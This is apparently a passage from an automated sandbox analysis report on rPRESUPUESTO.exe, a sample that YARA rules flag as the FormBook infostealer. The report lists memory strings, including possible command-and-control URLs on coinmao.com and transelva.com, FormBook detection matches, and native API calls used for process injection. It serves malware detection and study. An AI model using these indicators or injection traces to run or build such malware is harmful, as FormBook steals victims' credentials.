            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/notify.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/redirect.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/superpage.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-120x120.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-144x144.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-152x152.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-180x180.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-57x57.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-72x72.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-favicon-16x16.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-favicon-192x192.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-favicon-32x32.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-favicon-96x96.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/icon/a24-ms-icon-144x144.png
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/webmail_ikony_vlajky.png)
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/library/theme/hp16/style.css
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: ktmutil.exe, 00000009.00000002.4587088156.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: ktmutil.exe, 00000009.00000002.4587088156.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: ktmutil.exe, 00000009.00000003.2510849899.0000000007480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mssql.active24.com/
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mysql.active24.com/
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://webftp.active24.com/
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://webmail.active24.com/
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/dnssec
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/domeny
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/domeny#m-certifikace
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/jak-na-tvorbu-webu
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/klientska-zona/zakaznicka-podpora
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti/kariera
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti/kontakty
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti/media
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti/obchodni-podminky
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/o-spolecnosti/rikaji-o-nas-zakaznici
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/objednavka/login
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/spoluprace
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/upozorneni
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/webforward-mailforward
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.active24.com/weby/mojestranky
            Source: rPRESUPUESTO.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: ktmutil.exe, 00000009.00000002.4589157081.000000000480C000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.00000000047EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coinmao.com/irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004032000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004012000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.superstranka.cz/
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003CEE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0042B623 NtClose,5_2_0042B623
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812B60 NtClose,LdrInitializeThunk,5_2_01812B60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01812DF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01812C70
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018135C0 NtCreateMutant,LdrInitializeThunk,5_2_018135C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01814340 NtSetContextThread,5_2_01814340
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01814650 NtSuspendThread,5_2_01814650
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812B80 NtQueryInformationFile,5_2_01812B80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BA0 NtEnumerateValueKey,5_2_01812BA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BE0 NtQueryValueKey,5_2_01812BE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812BF0 NtAllocateVirtualMemory,5_2_01812BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AB0 NtWaitForSingleObject,5_2_01812AB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AD0 NtReadFile,5_2_01812AD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812AF0 NtWriteFile,5_2_01812AF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DB0 NtEnumerateKey,5_2_01812DB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812DD0 NtDelayExecution,5_2_01812DD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D00 NtSetInformationFile,5_2_01812D00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D10 NtMapViewOfSection,5_2_01812D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812D30 NtUnmapViewOfSection,5_2_01812D30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CA0 NtQueryInformationToken,5_2_01812CA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CC0 NtQueryVirtualMemory,5_2_01812CC0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812CF0 NtOpenProcess,5_2_01812CF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C00 NtQueryInformationProcess,5_2_01812C00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812C60 NtCreateKey,5_2_01812C60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F90 NtProtectVirtualMemory,5_2_01812F90
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FA0 NtQuerySection,5_2_01812FA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FB0 NtResumeThread,5_2_01812FB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812FE0 NtCreateFile,5_2_01812FE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F30 NtCreateSection,5_2_01812F30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812F60 NtCreateProcessEx,5_2_01812F60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812E80 NtReadVirtualMemory,5_2_01812E80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812EA0 NtAdjustPrivilegesToken,5_2_01812EA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812EE0 NtQueueApcThread,5_2_01812EE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812E30 NtWriteVirtualMemory,5_2_01812E30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813090 NtSetValueKey,5_2_01813090
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813010 NtOpenDirectoryObject,5_2_01813010
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018139B0 NtGetContextThread,5_2_018139B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813D10 NtOpenProcessToken,5_2_01813D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01813D70 NtOpenThread,5_2_01813D70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B94340 NtSetContextThread,LdrInitializeThunk,9_2_02B94340
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B94650 NtSuspendThread,LdrInitializeThunk,9_2_02B94650
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92AF0 NtWriteFile,LdrInitializeThunk,9_2_02B92AF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92AD0 NtReadFile,LdrInitializeThunk,9_2_02B92AD0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_02B92BA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_02B92BF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92BE0 NtQueryValueKey,LdrInitializeThunk,9_2_02B92BE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92B60 NtClose,LdrInitializeThunk,9_2_02B92B60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_02B92E80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92EE0 NtQueueApcThread,LdrInitializeThunk,9_2_02B92EE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92FB0 NtResumeThread,LdrInitializeThunk,9_2_02B92FB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92FE0 NtCreateFile,LdrInitializeThunk,9_2_02B92FE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92F30 NtCreateSection,LdrInitializeThunk,9_2_02B92F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_02B92CA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_02B92C70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92C60 NtCreateKey,LdrInitializeThunk,9_2_02B92C60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_02B92DF0
